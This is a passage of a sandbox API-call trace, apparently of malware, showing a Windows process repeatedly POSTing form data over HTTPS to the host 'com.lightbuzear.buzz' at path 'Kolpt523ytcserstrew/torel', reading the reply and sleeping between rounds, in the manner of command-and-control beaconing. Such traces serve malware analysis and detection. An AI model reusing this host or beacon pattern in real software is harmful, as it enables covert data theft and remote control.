(hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0209.693] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0209.693] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a3e8 | out: hHeap=0x4780000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0209.693] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0209.693] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0209.693] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0209.693] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0209.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaa8 [0209.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebe0 [0209.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0209.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebe0 | out: hHeap=0x4780000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a410 [0209.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0209.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a410 | out: hHeap=0x4780000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a320 [0209.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0209.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a3e8 [0209.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0209.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0209.695] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0209.695] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0210.903] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a3e8 | out: hHeap=0x4780000) returned 1 [0210.903] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0210.903] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0210.904] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0210.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0210.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0210.904] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0210.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0210.904] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0210.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0210.904] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0210.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0210.904] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0210.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea30 [0210.904] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0210.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebc8 [0210.905] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0210.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0210.905] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebc8 | out: hHeap=0x4780000) returned 1 [0210.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a2f8 [0210.905] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0210.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0210.905] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2f8 | out: hHeap=0x4780000) returned 1 [0210.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a460 [0210.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0210.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a370 [0210.906] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0210.906] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0210.906] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0210.906] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0210.907] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a370 | out: hHeap=0x4780000) returned 1 [0210.907] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0210.907] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0210.907] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0210.907] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0210.907] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0210.907] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0210.907] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0210.907] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0210.907] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0210.908] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0210.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb08 [0210.908] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0210.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec10 [0210.908] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb08 | out: hHeap=0x4780000) returned 1 [0210.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0210.908] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec10 | out: hHeap=0x4780000) returned 1 [0210.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a488 [0210.908] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0210.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0210.908] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a488 | out: hHeap=0x4780000) returned 1 [0210.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a258 [0210.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0210.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0210.908] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0210.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0210.909] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0210.909] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0210.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0210.909] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0210.909] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0210.910] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0210.910] FreeLibrary (hLibModule=0x71570000) returned 1 [0210.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0210.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0210.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a398 | out: hHeap=0x4780000) returned 1 [0210.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0210.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1b8 | out: hHeap=0x4780000) returned 1 [0210.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a078 | out: hHeap=0x4780000) returned 1 [0210.911] Sleep (dwMilliseconds=0x2710) [0210.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0210.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0210.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0210.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0210.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0210.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0210.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0210.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0210.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0210.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea30 [0210.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0210.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ead8 [0210.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0210.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0210.924] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ead8 | out: hHeap=0x4780000) returned 1 [0210.924] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eb20 [0210.924] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1b8 [0210.924] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1b8 | out: hHeap=0x4780000) returned 1 [0210.924] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0210.924] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a078 [0210.924] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0210.925] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0210.925] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0210.925] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0210.925] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0210.925] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0210.925] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0210.925] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0210.925] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0210.925] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0210.925] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea48 [0210.925] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0210.925] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb08 [0210.925] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea48 | out: hHeap=0x4780000) returned 1 [0210.925] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0210.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb08 | out: hHeap=0x4780000) returned 1 [0210.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a1b8 [0210.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0210.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0210.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1b8 | out: hHeap=0x4780000) returned 1 [0210.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1b8 [0210.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0210.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0210.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0210.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0210.927] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0210.927] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0210.927] FreeLibrary (hLibModule=0x71780000) returned 1 [0210.928] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0210.928] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0210.928] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0210.928] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0210.928] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0210.928] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0210.928] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0210.928] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0210.928] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0210.928] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0210.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0210.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0210.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0210.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebf8 [0210.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0210.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb98 [0210.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebf8 | out: hHeap=0x4780000) returned 1 [0210.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0210.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb98 | out: hHeap=0x4780000) returned 1 [0210.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ecb8 [0210.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a280 [0210.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a280 | out: hHeap=0x4780000) returned 1 [0210.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0210.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a280 [0210.929] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0210.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0210.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0210.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0210.930] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0210.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0210.930] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0210.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0210.930] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0210.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0210.930] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0210.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed00 [0210.930] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0210.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eaa8 [0210.930] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed00 | out: hHeap=0x4780000) returned 1 [0210.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0210.930] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0210.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ea48 [0210.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a3e8 [0210.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a3e8 | out: hHeap=0x4780000) returned 1 [0210.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0210.931] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0210.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0210.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0210.932] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0210.932] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0210.932] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0210.932] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaa8 [0210.932] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebe0 [0210.932] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0210.932] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebe0 | out: hHeap=0x4780000) returned 1 [0210.933] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a3e8 [0210.933] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0210.933] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0210.933] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a3e8 | out: hHeap=0x4780000) returned 1 [0210.933] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2d0 [0210.933] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0210.933] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2f8 [0210.933] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0210.934] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0210.934] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0210.934] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0210.934] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2f8 | out: hHeap=0x4780000) returned 1 [0210.934] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0210.934] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0210.935] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0210.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0210.935] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0210.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0210.935] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0210.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0210.935] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0210.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea18 [0210.935] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0210.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec70 [0210.935] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea18 | out: hHeap=0x4780000) returned 1 [0210.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0210.935] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec70 | out: hHeap=0x4780000) returned 1 [0210.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a3e8 [0210.935] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0210.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0210.935] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a3e8 | out: hHeap=0x4780000) returned 1 [0210.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2f8 [0210.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0210.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a488 [0210.936] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, 